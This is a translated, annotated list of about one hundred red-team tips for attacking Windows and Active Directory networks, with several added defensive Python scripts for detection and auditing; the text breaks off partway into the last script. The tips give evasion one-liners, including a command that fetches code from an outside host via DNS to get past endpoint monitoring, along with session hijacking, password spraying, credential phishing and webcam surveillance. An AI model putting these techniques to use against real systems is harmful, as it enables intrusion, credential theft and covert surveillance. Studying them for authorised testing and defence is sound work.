These red team penetration-testing tips come from the Red Team Tips site of the expert @vysecurity (Vincent Yiu, 斯圆安全); treat this post as a translation draft. The aim is to think about the contest from both the red and the blue side and fill in my own gaps.
Red Team Tips
1-10
Red tip #1: Profile your victim and use their user agent to mask your traffic. Alternatively use a UA from software such as Outlook.
Red tip #2: If the enemy SOC is using proxy logs for analysis, guess what? It won't log cookies or POST body content, as they can be sensitive.
Red tip #3: Taking a snapshot of AD can let you browse, explore and formulate future attacks if access is lost momentarily.
TIP
- Those unfamiliar with AD penetration can read this post
Red tip #4: Consider using Office template macros and replacing normal.dot for persistence in VDI environments.
- Unclear: is this macro approach not worth considering in non-virtualised environments?
Red tip #5: Do a DNS lookup for terms such as intranet, sharepoint, wiki, nessus, cyberark and many others to start intel on your target.
Red tip #6: Got access but need to find targets? Use WMIC to query and dump the DNS zone for a better view of assets - https://serverfault.com/questions/550385/export-all-hosts-from-dns-manager-using-powershell
Red tip #7: Whether PSEXEC, WMI, PS remoting or even the recent COM execution technique for lateral movement, don't forget beloved RDP.
Red tip #8: Make sure there are trackers in your emails, delivery server and payload execution. Any more? Comment to share!
- Unclear: what do "trackers" refer to here?
Red tip #9: When PowerUp yields no results, don't forget Sysinternals' AutoRuns. Often you can find unexpected surprises 😃
TIP
- The Sysinternals AutoRuns startup tool also has a command-line version.
Red tip #10: When using BloodHound, don't forget DA equivalents such as Administrators and Server Operators etc. too. These aren't mapped.
TIP
- Supplementary domain-penetration knowledge, 2019.10.15 9:00
11-20
Red tip #11: When navigating mature environments, a good old network diagram along with AD OUs can help to shed some light on next steps.
Red tip #12: Kerberoast them hashes; it could be a fast route to domain administrator. PowerView: Invoke-Kerberoast -Format Hashcat
TIP
- The process of cracking Kerberos service tickets and rewriting them to obtain access to the target service is called Kerberoasting.
- Kerberoasting process, reference
- Tool address
Red tip #13: Shared local administrator account hashes are great for lateral movement. Find machines based on the same build and attack away.
Red tip #14: Got extra credentials? Use different sets for separate egress channels so that if one account is disabled all the rest are OK.
Red tip #15: You don't need payloads when you can phish credentials and log in to Citrix, VPN, email with no 2FA. Check the perimeter.
TIP
- If you can phish, don't break in the hard way!
Red tip #16: @dafthack MailSniper, @domchell LyncSniper can be a useful but noisy way to obtain AD credentials into an organisation.
TIP
- MailSniper is a penetration-testing tool for searching e-mail in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-admin user to search their own e-mail, or as an administrator to search the mailbox of every user in the domain.
- LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted internally or in Office 365.
Red tip #17: @_staaldraad's Ruler tool can be used to obtain code execution on a system running Outlook if you can access Exchange externally.
Red tip #18: When tools like MailSniper don't work in custom environments, you still have good old @Burp_Suite to replicate the attacks.
Red tip #19: Need a DC? echo %LOGONSERVER%. Need a list? nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)
- Translator's note: common domain-penetration command lines.
Red tip #20: So apparently not many people use SSH for redirector setup. So try out ssh c2 -R *:80:localhost:80 with SSH config GatewayPorts yes.
21-30
Red tip #21: Found open user home shares that are accessible? See if you can drop into Startup Programs for lateral movement and privesc.
Red tip #22: Use VNC, microphone and webcam to perform surveillance. netstat and tasklist can provide context into what the user's doing.
Red tip #23: Stash payloads in C:\$Recycle.Bin
Red tip #24: Compromise the SOC and security teams to watch their progress and track their email alerts for sophisticated threats.
Red tip #25: Probably don't do this on a red team, but spray for Welcome1, Password1 if you're struggling to move. But move off fast.
- Translator's note: I didn't understand this one; I'll ask him on WeChat later.
Red tip #26: Split your campaigns up so that they are independent. Fire tons at once for decoys and to burn out the defence.
Red tip #27: Need more credentials? Search for passwords on SharePoint and the intranet.
- Translator's note: GitHub too.
Red tip #28: Look for asset registers to understand who owns what machine, make and model. There's usually an asset label to host name too!
Red tip #29: Lateral movement: printers, open webroots, good old Tomcat. What are your quick wins?
Red tip #30: Got AD credentials? Turn up on site and you might be able to use them to log in to corporate Wi-Fi 😃
31-40
Red tip #31: Hunting e-mails and network shares for penetration testing reports can often yield good results.
Red tip #32: List mounts: net use, look for shared folders and drop a UNC icon LNK into it. Run Inveigh or Wireshark on the host to grab hashes.
TIP
- Inveigh is a Windows PowerShell LLMNR/NBNS spoofing / man-in-the-middle tool. It can effectively help penetration testers find problems in Windows systems.
- Unclear
Red tip #33: Orgs are transitioning to cloud services such as AWS, Beanstalk, O365, Google Apps. 2FA is vital - password reset to compromise.
Red tip #34: OpSec. Set notifications to your phone for logins or intrusion attempts in any part of your attack infrastructure.
Red tip #35: FireEye sandbox flagging your payloads? Try anti-sandbox techniques! If not, just use HTA to get into memory as it doesn't scan.
Red tip #36: Don't forget the good old GPP passwords in SYSVOL. There may be cached GPP on the machine. Applying the patch isn't enough.
- Domain penetration
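From the defender's side, tip #36 is an audit job: every cpassword attribute left in a Group Policy Preference XML file is a recoverable password, because the AES key that encrypts it was published by Microsoft, and the MS14-025 patch only stops new ones being written. The following is an added example written for this post, not code from Red Team Tips; the XML documents and policy paths are constructed, with the per-element clsid GUIDs of real files replaced by placeholders.

```python
"""Audit Group Policy Preference XML for leftover cpassword attributes (tip #36).
Added example for this post; the XML below is constructed, not real SYSVOL content."""
import xml.etree.ElementTree as ET

# Constructed GPP files, keyed by their relative path under SYSVOL\<domain>\Policies\.
# Real files carry clsid GUIDs on each element; they are replaced with placeholders here.
SAMPLE_GPP_FILES = {
    "{POLICY-GUID-1}/Machine/Preferences/Groups/Groups.xml": """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CLSID-PLACEHOLDER}">
  <User clsid="{CLSID-PLACEHOLDER}" name="LocalAdmin" changed="2014-01-01 10:00:00">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED-BASE64-BLOB==" changeLogon="0" userName="LocalAdmin"/>
  </User>
</Groups>""",
    "{POLICY-GUID-2}/Machine/Preferences/ScheduledTasks/ScheduledTasks.xml": """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CLSID-PLACEHOLDER}">
  <Task clsid="{CLSID-PLACEHOLDER}" name="Backup">
    <Properties runAs="CORP\\svc_backup" cpassword="" logonType="Password"/>
  </Task>
</ScheduledTasks>""",
    "{POLICY-GUID-3}/User/Preferences/Drives/Drives.xml": """<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{CLSID-PLACEHOLDER}">
  <Drive clsid="{CLSID-PLACEHOLDER}" name="H:">
    <Properties action="U" path="\\\\fs01\\home" label="Home" persistent="1"/>
  </Drive>
</Drives>""",
}

# Attributes that name the account a GPP item acts on or runs as.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")


def find_cpasswords(gpp_files):
    """Return one (path, element tag, account) tuple per non-empty cpassword attribute.
    An empty cpassword="" stores nothing and is not reported."""
    findings = []
    for path, xml_text in gpp_files.items():
        root = ET.fromstring(xml_text)
        for elem in root.iter():
            blob = elem.get("cpassword")
            if blob:
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
                findings.append((path, elem.tag, account))
    return findings


if __name__ == "__main__":
    for path, tag, account in find_cpasswords(SAMPLE_GPP_FILES):
        print(f"cpassword present: {path} <{tag}> account={account}")
```

Run the same scan over the local GPP cache under C:\ProgramData\Microsoft\Group Policy\History on workstations, which is where the "cached GPP on the machine" from the tip lives. Remediation is to delete the preference item and rotate the account's password, not just to remove the attribute.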
Red tip #37: Use GenHTA to generate HTA files that use anti-sandboxing techniques. https://github.com/vysec/GenHTA
Red tip #38: Having trouble getting @armitagehacker Cobalt Strike's evil.hta through defenses? https://github.com/vysec/MorphHTA
- Translator's note: MorphHTA YouTube video:
Red tip #39: If emails get bounced, read the email! Sometimes it's due to malware scanners, spam etc. Or you may even get an out-of-office reply.
Red tip #40: @0x09AL suggests looking for default credentials on printers and embedded devices. Move off the initial foothold using this.
41-50
Red tip #41: @Oddvarmoe suggests using Alternate Data Streams if you need to put a file on disk. For example https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1
- Unclear
Red tip #42: Got OS level access to a middle tier? tasklist, netstat and wmic process list full | findstr /I commandline for more ideas!
Red tip #43: So you know where the server application files are. Download the binaries and check out configuration files for conn. strings.
Red tip #44: Run PEiD and other packer / technology checkers to find out the language and packer used on downloaded server binaries.
Red tip #45: Run strings on the application binary for potentially other cleartext sensitive strings! (Unicode mode too)
Red tip #46: On a VDI? Check out C:\ and other disks for potentially sensitive files other users may have saved there.
Red tip #47: In case EDR is looking for net users /domain, try using net use /dom
Red tip #48: Is EDR potentially looking for powershell -encodedcommand? Try powershell -ec
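Tips #47 and #48 both exploit the same detection-engineering mistake: a rule that matches the spelled-out command line while the program itself accepts abbreviations (powershell.exe's short forms such as -ec, -nop and -w, and net.exe's abbreviated switches). The defensive fix is to normalise the command line before matching. The following is an added example written for this post, not code from Red Team Tips: the alias table holds powershell.exe's documented short forms, and the unique-prefix rule is an assumption that approximates how powershell.exe and net.exe resolve other abbreviations.

```python
"""Normalise Windows command lines so that abbreviated forms (tips #47 and #48) match
the same detection rule as the long form. Added example for this post; the alias
table is from powershell.exe's documented short forms, and the unique-prefix rule
is an assumption approximating how powershell.exe and net.exe resolve abbreviations."""

# Documented short forms that win even where a prefix would be ambiguous (-e vs -ex).
PS_ALIASES = {
    "e": "encodedcommand", "ec": "encodedcommand", "enc": "encodedcommand",
    "c": "command", "nop": "noprofile", "noni": "noninteractive",
    "w": "windowstyle", "ep": "executionpolicy", "ex": "executionpolicy",
}
PS_PARAMS = ["encodedcommand", "command", "noprofile", "noninteractive", "windowstyle",
             "executionpolicy", "nologo", "noexit", "file", "sta", "mta", "version"]
NET_SUBCMDS = {"users": "user", "user": "user", "use": "use", "group": "group",
               "localgroup": "localgroup", "view": "view"}
NET_SWITCHES = ["domain", "delete", "add", "active", "persistent"]


def expand_prefix(name, table):
    """Return the unique table entry that starts with `name`, or `name` if none/ambiguous."""
    hits = [p for p in table if p.startswith(name)]
    return hits[0] if len(hits) == 1 else name


def normalize(cmdline):
    """Canonical form: bare lower-case executable name, full parameter/switch names.
    Tokens that are not parameters (values, paths) are kept as written."""
    toks = cmdline.split()
    if not toks:
        return ""
    exe = toks[0].lower().rsplit("\\", 1)[-1].strip('"')
    if exe.endswith(".exe"):
        exe = exe[:-4]
    out = [exe]
    if exe in ("powershell", "pwsh"):
        for t in toks[1:]:
            if t.startswith("-") and len(t) > 1:
                name = t[1:].lower()
                out.append("-" + (PS_ALIASES.get(name) or expand_prefix(name, PS_PARAMS)))
            else:
                out.append(t)
    elif exe == "net" and len(toks) > 1:
        sub = toks[1].lower()
        out.append(NET_SUBCMDS.get(sub, sub))
        for t in toks[2:]:
            out.append("/" + expand_prefix(t[1:].lower(), NET_SWITCHES) if t.startswith("/") else t)
    else:
        out.extend(toks[1:])
    return " ".join(out)


def is_suspicious(cmdline):
    """Rules are written once, against the canonical form only."""
    canon = normalize(cmdline)
    encoded_ps = canon.startswith(("powershell", "pwsh")) and "-encodedcommand" in canon
    domain_enum = canon.startswith("net user") and "/domain" in canon
    return encoded_ps or domain_enum
```

The same normalisation step belongs in front of any command-line rule, not just these two; once it is there, the rule for -encodedcommand also catches -e, -ec and -enc, and the rule for net user /domain also catches the /dom and /do spellings.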
Red tip #49: Attacking a heavy Macintosh or Linux estate? Send an Office maldoc with OS checking logic to obtain footholds on either system.
Red tip #50: Carbon Black checks for IEX and web req commands. Use powershell . (nslookup -q=txt calc.vincentyiu.co.uk)[-1]
TIP
Carbon Black focuses on endpoint APT protection solutions and has a distinctive approach to endpoint threat analysis, protection and response.
51-60
Red tip #51: Can't open the C drive? Try \\127.0.0.1\c$
Red tip #52: SC doesn't take credentials. Can't use runas? Try net use \\targetip\ipc$ password /u:domain\username then sc to psexec.
TIP
In the Windows command prompt there is the SC tool command set, used mainly to manage operating system services; the command name is shortened from the word "service". sc \\server start ServiceName; sc \\server stop ServiceName; net use \\server password /USER:user (there is no "logon" step, so this may need to be run first). One advantage of sc over psexec is that no console window is shown on the remote computer.
Red tip #53: When stick phishing for 2FA, consider using @mrgretzky's Evilginx project, which logs cookies. https://breakdev.org/evilginx-1-1-release/
Red tip #54: Hide from blue. Volume shadow copy, then execute \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\malware.exe/dll, then delete the VSC.
TIP
- This seems to use a volume shadow copy to load the payload.
- The Volume Shadow Copy Service is a Microsoft Windows component service, supported since Windows XP. It takes copies of volumes on a schedule and adds a "Shadow Copies" option to the volume.
- Microsoft: manages and implements volume shadow copies used for backup and other purposes. If this service is stopped, shadow copies will be unavailable for backup and the backup may fail. If this service is disabled, any services that depend on it will fail to start.
- Supplement: as noted above, things used for backup, such as the MS Backup program, need this service.
- Dependencies: Remote Procedure Call (RPC)
Red tip #55: SMB hash leaking using a UNC path for an image in a page for a drive-by leak can give you credentials for less mature environments.
TIP
- UNC path injection via image links
- (Recommended) UNC path injection via image links, original article
- Similar to tip #32
Red tip #56: Target victims using email authentication such as Microsoft Account on Windows 10? Hash leak exposes full email address!
Red tip #57: Working in teams yields better results; and best of all makes offensive operations more fun and keeps the adrenaline pumping.
Red tip #58: Discuss business targets and objectives with your clients. This process should set non-technical goals such as "ATM spit money".
TIP
- For clients outside the technical field, these are more likely to earn their understanding or attention.
Red tip #59: Checking whether a server or host is good for egress? Likely to go down? systeminfo | findstr /i boot
TIP
Shows the machine's boot time: systeminfo | findstr /i boot
Red tip #60: Type query user to see who else is connected to the machine.
61-70
Red tip #61: Get a quick patch list using wmic qfe list brief. Cross-ref KBs to bulletins.
Red tip #62: Found a process of interest? Don't forget to obtain a MiniDump! Use Out-MiniDump https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
Red tip #63: Finally in CyberArk, click Policies and see safes but no account? Go to accounts search and search for empty, and safes show up.
TIP
- CyberArk is a listed company focused on privileged access security and is rated a "Leader" in "Privileged Access Management" by Gartner.
- Never used it; unclear
Red tip #64: Is WebDAV allowed through the gateway? Using the HTTP mini redirector? Don't exfiltrate or send in files. WebDAV is subject to DLP.
- Unclear
Red tip #65: WebDAV mini HTTP redirector: net use * http://totallylegit.com/share then start z:
- Unclear
Red tip #66: Found potential MQ creds? ActiveMQ? Try out https://github.com/fmtn/a, works to query MQ endpoints that don't use self-signed certs.
Red tip #67: Use vssadmin to list and create volume shadow copies.
TIP
- vssadmin command line
- Related to tip #54
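The chain in tips #54 and #67 (create a shadow copy, run a binary out of its \\?\GLOBALROOT device path, delete the copy) is easy to see from the blue side once process-creation events carry the command line, for example Sysmon event 1 or Security event 4688 with command-line auditing enabled. Creating or listing shadows on its own is what backup software does every day, so the stage worth alerting on is execution from the shadow-copy path. The following is an added example written for this post, not code from Red Team Tips; the events are constructed.

```python
"""Spot the shadow-copy execution chain from tips #54 and #67 in process-creation
telemetry (e.g. Sysmon event 1 or Security event 4688 with command-line logging).
Added example for this post; the events below are constructed."""
import re
from collections import defaultdict

# Stages of the chain, each matched against the full command line (case-insensitive).
STAGES = {
    "create_shadow": re.compile(
        r"\b(vssadmin(\.exe)?\s+create\s+shadow|wmic(\.exe)?\s+shadowcopy\s+call\s+create)\b", re.I),
    "exec_from_shadow": re.compile(r"\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+\\", re.I),
    "delete_shadow": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
}

# Constructed process-creation events: (host, command line).
EVENTS = [
    ("WS01", r"vssadmin.exe create shadow /for=C:"),
    ("WS01", r"C:\Windows\System32\cmd.exe /c \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\Public\update.exe"),
    ("WS01", r"vssadmin delete shadows /for=C: /quiet"),
    ("BACKUP01", r"vssadmin create shadow /for=D:"),   # backup job: create only
    ("BACKUP01", r"vssadmin list shadows"),
    ("WS02", r"rundll32.exe \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Temp\m.dll,Start"),
]


def classify(cmdline):
    """Return the set of chain stages a single command line matches."""
    return {stage for stage, rx in STAGES.items() if rx.search(cmdline)}


def shadow_abuse_by_host(events):
    """Hosts where a binary was launched out of a shadow-copy device path, with
    every stage seen on that host. Creating or listing shadows alone is normal
    backup behaviour and is not reported on its own."""
    seen = defaultdict(set)
    for host, cmd in events:
        seen[host] |= classify(cmd)
    return {h: sorted(s) for h, s in seen.items() if "exec_from_shadow" in s}


if __name__ == "__main__":
    for host, stages in shadow_abuse_by_host(EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

A host that shows all three stages in a short window (WS01 above) is the full pattern from tip #54; the delete step is also what ransomware does, so "delete_shadow" from anything other than the backup agent deserves its own rule.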
Red tip #68: Pivoting into a secure zone that has no DNS or web gateway and need exfil? Netsh port forward pivot UDP 53 to DNS 53, then boom.
Red tip #69: Has blue hidden the usual ways in, including WinKey+R? Try shift and right-click on the desktop and open a command prompt.
Red tip #70: Tracked down that PuTTY session? Popped the box? query user and check the victim's logon time and idle times.
71-80
Red tip #71: Hijack his session using sc create sesshijack binpath= "cmd.exe /k tscon <ID> /dest:<SESSIONNAME>" then use the PuTTY session.
Red tip #72: Most people understand email sec wrong. SPF does not mean not spoofable. SPF does nothing without DMARC.
TIP
- Sender Policy Framework (SPF) strengthens DNS server security and restricts who can send e-mail using your domain name. SPF prevents domain spoofing by letting your mail server determine when a message was sent from the domain it uses. SPF has three main parts: the policy framework, the authentication method, and the special mail headers that carry this information.
- The DomainKeys Identified Mail (DKIM) protocol ensures that message content cannot be snooped on or tampered with. After its first version in early 2007 it went through several revisions; the most recent update is IETF standard 8301 from January this year. SPF and DKIM were both updated in IETF standard 7372 in 2014.
- Domain-based Message Authentication, Reporting and Conformance (DMARC) glues SPF and DKIM together with a coordinated set of policies, ties the sending domain to what is listed in the From: header, and has a better feedback mechanism for recipients.
Red tip #73: Weak DMARC on the victim org domain? Spoof their own emails back into themselves! You even inherit their AD name and photo.
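The point of tips #72 and #73, in code: SPF only tells a receiver which hosts may send for a domain, and it is DMARC that says what to do with the result and ties it to the From: header the user actually sees, so a domain with a strict SPF record but no DMARC, or a DMARC record at p=none, still passes spoofed mail. The following checker is an added example written for this post, not code from Red Team Tips; the TXT records are constructed and served from a dict so the script runs offline (replace the lookup with a real DNS query in practice).

```python
"""Check the SPF/DMARC posture described in tips #72 and #73 from DNS TXT data.
Added example for this post; the records are constructed and the lookups are
served from a dict so it runs offline."""

# Constructed TXT records keyed by owner name.
RECORDS = {
    "strict.example": ["v=spf1 include:_spf.mail.example -all"],
    "_dmarc.strict.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@strict.example"],
    "spf-only.example": ["v=spf1 ip4:203.0.113.0/24 -all"],      # SPF, but no DMARC
    "monitor.example": ["v=spf1 ip4:203.0.113.0/24 ~all"],
    "_dmarc.monitor.example": ["v=DMARC1; p=none; rua=mailto:reports@monitor.example"],
    "nothing.example": [],
}


def parse_spf(txt):
    """Return {'all': qualifier} for a v=spf1 record, where the qualifier of the
    'all' mechanism is '+', '-', '~', '?' or None; None when txt is not SPF."""
    if not txt.lower().startswith("v=spf1"):
        return None
    qualifier = None
    for term in txt.split()[1:]:
        if term.lstrip("+-~?").lower() == "all":
            qualifier = term[0] if term[0] in "+-~?" else "+"
    return {"all": qualifier}


def parse_dmarc(txt):
    """Return DMARC tags as a dict, or None when txt is not a DMARC record."""
    if not txt.lower().startswith("v=dmarc1"):
        return None
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def first_record(name, parser, records):
    """First TXT record at `name` that `parser` accepts, else None."""
    for txt in records.get(name, []):
        parsed = parser(txt)
        if parsed is not None:
            return parsed
    return None


def assess(domain, records=RECORDS):
    """List the weaknesses that let mail claiming to be from `domain` through."""
    findings = []
    spf = first_record(domain, parse_spf, records)
    dmarc = first_record("_dmarc." + domain, parse_dmarc, records)
    if spf is None:
        findings.append("no SPF record")
    elif spf["all"] in ("+", "?", None):
        findings.append(f"SPF 'all' qualifier {spf['all']!r} does not fail unauthorised senders")
    if dmarc is None:
        findings.append("no DMARC record: SPF/DKIM results are never tied to the From: header")
    else:
        policy = dmarc.get("p", "none").lower()
        if policy == "none":
            findings.append("DMARC p=none: monitoring only, spoofed mail is still delivered")
        if dmarc.get("pct", "100") != "100":
            findings.append(f"DMARC pct={dmarc['pct']}: policy applied to a sample of messages only")
    return findings
```

The "spf-only.example" case is exactly the misunderstanding tip #72 calls out: a hard-fail SPF record that, without DMARC, a receiver is under no instruction to act on. Moving a domain from p=none to p=quarantine and then p=reject, after reviewing the rua reports, is what closes tip #73.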
Red tip #74: Got access to a Microsoft OWA mailbox or O365? You can extract the global catalog from contacts: use @Burp_Suite and parse the JSON object.
Red tip #75: Write PHP delivery scripts that can mutate your payloads and add unique trackers per download. This tracks the file being executed.
TIP
Metasploit's Web Delivery Script is a versatile module that creates a server on the attacking machine which hosts a payload. When the victim connects to the attacking server, the payload will be executed on the victim machine. This exploit requires a method of executing commands on the victim machine.
Red tip #76: Simulating a criminal threat story with a smash-and-grab agenda? Phish users and hot-swap the payload mid-campaign to test formats.
Red tip #77: RCE on a web application for a less mature client? nslookup -q=srv _ldap._tcp; if it's domain-joined, Invoke-Kerberoast
TIP
- Similar to tip #12
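Tips #12 and #77 both end in Kerberoasting, and from the defender's side the request pattern is visible in Windows Security event 4769 (a Kerberos service ticket was requested): one account asking for RC4-encrypted tickets (TicketEncryptionType 0x17) for many different service accounts in a short time. The following is an added example written for this post, not code from Red Team Tips or PowerView; the event records are constructed, with the 4769 fields flattened into plain dicts.

```python
"""Detection sketch for Kerberoasting (tips #12 and #77): one account requesting
RC4 service tickets for many distinct service accounts.
Added example for this post; the 4769 records below are constructed."""
from collections import defaultdict

# Constructed Security event 4769 records, flattened to the fields the rule needs:
# requesting account, ServiceName, TicketEncryptionType and Status.
EVENTS_4769 = [
    {"user": "jdoe@CORP.LOCAL",   "service": "krbtgt",     "etype": "0x12", "status": "0x0"},
    {"user": "jdoe@CORP.LOCAL",   "service": "FILESRV01$", "etype": "0x12", "status": "0x0"},
    {"user": "bob@CORP.LOCAL",    "service": "svc_sql",    "etype": "0x17", "status": "0x0"},
    {"user": "bob@CORP.LOCAL",    "service": "svc_web",    "etype": "0x17", "status": "0x0"},
    {"user": "bob@CORP.LOCAL",    "service": "svc_backup", "etype": "0x17", "status": "0x0"},
    {"user": "bob@CORP.LOCAL",    "service": "svc_sccm",   "etype": "0x17", "status": "0x0"},
    {"user": "legacy@CORP.LOCAL", "service": "svc_old",    "etype": "0x17", "status": "0x0"},
    {"user": "eve@CORP.LOCAL",    "service": "svc_sql",    "etype": "0x17", "status": "0x6"},  # failed request
]

# 0x17 = RC4-HMAC, 0x18 = RC4-HMAC-EXP; AES tickets (0x11/0x12) are far slower to crack.
RC4_ETYPES = {"0x17", "0x18"}


def is_roastable_request(event):
    """Successful TGS request, RC4 encryption, for a user-style service account
    (machine accounts end in '$' and krbtgt is requested at every logon)."""
    svc = event["service"]
    return (event["status"] == "0x0"
            and event["etype"] in RC4_ETYPES
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_kerberoast_bursts(events, threshold=3):
    """Map each account to the sorted distinct services it requested RC4 tickets for,
    keeping only accounts at or above `threshold` distinct services."""
    per_user = defaultdict(set)
    for e in events:
        if is_roastable_request(e):
            per_user[e["user"]].add(e["service"])
    return {u: sorted(s) for u, s in per_user.items() if len(s) >= threshold}


if __name__ == "__main__":
    for user, services in find_kerberoast_bursts(EVENTS_4769).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

The threshold is what separates a roasting run from a user who legitimately talks to one or two services with an RC4-only SPN; the lasting fix is to set service accounts to AES-only, give them long random passwords (or use group managed service accounts), and keep one unused account with an SPN whose 4769 events are an alert on their own.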
Red tip #78: @benichmt1 suggests looking for vmdk files across the network. You can use this to potentially access segregated networks.
Red tip #79: Obfuscation is never bad, especially when it's a button click. @danielhbohannon - https://github.com/danielbohannon
Red tip #80: Need to sweep for uptimes? Use wmic /node:"<computer>" OS get LastBootUpTime in a for loop.
81-90
Red tip #81: Looking for systems running KeePass? Run a for loop on wmic /node:"host" process list brief 😃 then look at RT #82
Red tip #82: Found KeePass running in memory? Use @harmj0y's KeeThief to extract the password and download the KDBX - https://github.com/HarmJ0y/KeeThief
TIP
KDBX file: the data file created by KeePass Password Safe is called a KDBX file (KeePass v2 Password Database).
Red tip #83: Struggling to find a working DB client? Live off the land and use your victim's in an RDP session.
Red tip #84: I'm sure everyone hates Oracle DB but no sweat, you can ProxyCap sqldeveloper.exe
TIP
ProxyCap enables you to redirect your computer's network connections through proxy servers. You can tell ProxyCap which applications will connect to the Internet through a proxy and under what circumstances. This is done through a user friendly interface, without the need to reconfigure any of your Internet clients. ProxyCap has native support for the SSH protocol, allowing you to specify a SSH server as the proxy server.
Red tip #85: Check the user's calendar before using persistence on their machine. They may be out of office and screw your master plans.
Red tip #86: Red team and attack simulation is not penetration testing. You shouldn't really be testing anything, but simply infiltrating.
Red tip #87: @Oddvarmoe uses .UDL files to quickly launch an MSSQL connection test to validate credentials! https://blogs.msdn.microsoft.com/farukcelik/2007/12/31/basics-first-udl-test/
Red tip #88: Don't forget physical security! Whip up a Pi with GSM and you can hack your way in by dropping the Pi on the network.
Red tip #89: regsvr32 SCT files are being detected as Squigglydoo. It looks for script case-sensitive and <registration case-insensitive.
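Tip #89 describes a detection rule with a hole: one of its two strings is matched case-sensitively, so a scriptlet whose tags are simply upper-cased is never flagged. The defensive lesson is that signatures over attacker-controlled text need case-insensitive, whitespace-tolerant matching and should key on the structure that makes the file what it is. The following is an added example written for this post, not code from Red Team Tips; the scriptlet samples are constructed with a harmless placeholder body.

```python
"""Why a case-sensitive match on 'script' misses regsvr32 scriptlets (tip #89), and
the case-insensitive, whitespace-tolerant rule that does not. Added example for
this post; the SCT samples are constructed with a harmless placeholder body."""
import re

SCT_LOWER = b"""<?XML version="1.0"?>
<scriptlet>
<registration progid="Example" classid="{00000000-0000-0000-0000-000000000000}">
<script language="JScript"><![CDATA[ /* constructed placeholder, no payload */ ]]></script>
</registration>
</scriptlet>"""

# Same document with the tag names upper-cased and extra whitespace inside the tags.
SCT_UPPER = b"""<?XML version="1.0"?>
<SCRIPTLET>
<  Registration progid="Example" classid="{00000000-0000-0000-0000-000000000000}">
<  SCRIPT language="JScript"><![CDATA[ /* constructed placeholder, no payload */ ]]></SCRIPT>
</Registration>
</SCRIPTLET>"""

BENIGN_XML = b"""<?xml version="1.0"?>
<config><script src="app.js"/><name>not a scriptlet</name></config>"""


def naive_detect(data):
    """The rule as described in the tip: 'script' matched exactly, '<registration'
    matched case-insensitively. Any upper-cased script tag evades it."""
    return b"script" in data and re.search(rb"<registration", data, re.IGNORECASE) is not None


def robust_detect(data):
    """Case-insensitive, allow whitespace after '<', and require the three elements
    that make a file a COM scriptlet: scriptlet, registration and script."""
    tags = ("scriptlet", "registration", "script")
    return all(re.search(rb"<\s*" + t.encode() + rb"\b", data, re.IGNORECASE) for t in tags)
```

Content signatures like this should be paired with a process rule, since the file is only dangerous when regsvr32 loads it through scrobj.dll; that half of the detection does not depend on how the XML is spelled.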
Red tip #90: Cisco NGIPS is shit; when analysing traffic for Havex it drops only <havexhavex> but not <havexDATABLOBhavex>
TIP
After effective propagation, the Havex malware is fully capable of disabling hydroelectric dams, overloading nuclear plants, and even shutting down the power grid of a region or country; analysis of it concluded that Havex marks ICS security entering the APT 2.0 era.
91-100
Red tip #91: Decoys can be as simple as burning egress by port scanning 1-1024 through IDS, or spamming dodgy emails at blocks of employees.
Red tip #92: If WDigest is disabled, re-enable it for cleartext credentials before new users log in with @harmj0y's https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1
TIP
Explicitly sets WDigest on a Windows 8.1/Server 2012 machine to use logon credentials. Locks the screen afterwards so the user must retype their password.
Red tip #93: Use EmPyre to generate Macintosh and Linux payloads; modify it to contain code for Windows too! https://github.com/EmpireProject/EmPyre
TIP
EmPyre is a Python-based post-exploitation framework for remotely compromising OS X systems. It has built-in OS X exploitation modules and feels refreshing compared with Metasploit. EmPyre GitHub address
Red tip #94: Client uses VDIs? Compromise the underlying host and use the Citrix Shadow Taskbar to spy on VDI sessions by selecting the username.
Red tip #95: @domchell recommends avoiding non-persistent VDIs and persisting on laptops. Query the DC for live laptops.
TIP
- Unclear
Red tip #96: @lucasgates recommends using OLE objects containing VBS scripts instead of macros as less suspicious. VBE will work too.
Red tip #97: Use recent critical vulnerabilities such as the CVE-2017-0199 HTA handler issue to simulate real threats. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
Red tip #98: @0x09AL suggests WordSteal. You can embed an IMAGE with a UNC path to steal hashes from Word. Won't work if there's a proxy. https://github.com/0x09AL/WordSteal
TIP
- WordSteal
- Similar to #55
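Tips #32, #55 and #98 all rely on the same thing: a Windows client that is allowed to speak SMB to an address outside the organisation, which is why #98 notes the trick fails behind a proxy. The network-side control is to block outbound TCP 445 and 139 at the perimeter and in the host firewall, and the detection is any internal-to-external SMB flow in the firewall log. The following is an added example written for this post, not code from Red Team Tips; the log format and addresses are constructed.

```python
"""Flag outbound SMB from constructed firewall log lines, the network-side sign of
the UNC-path hash leaks in tips #32, #55 and #98. Added example for this post; the
log format and addresses are constructed."""
import ipaddress
import re

# Ranges treated as internal. Documentation addresses (198.51.100.0/24 etc.) play
# the 'public' side below, so Python's is_private, which also covers them, is not used.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
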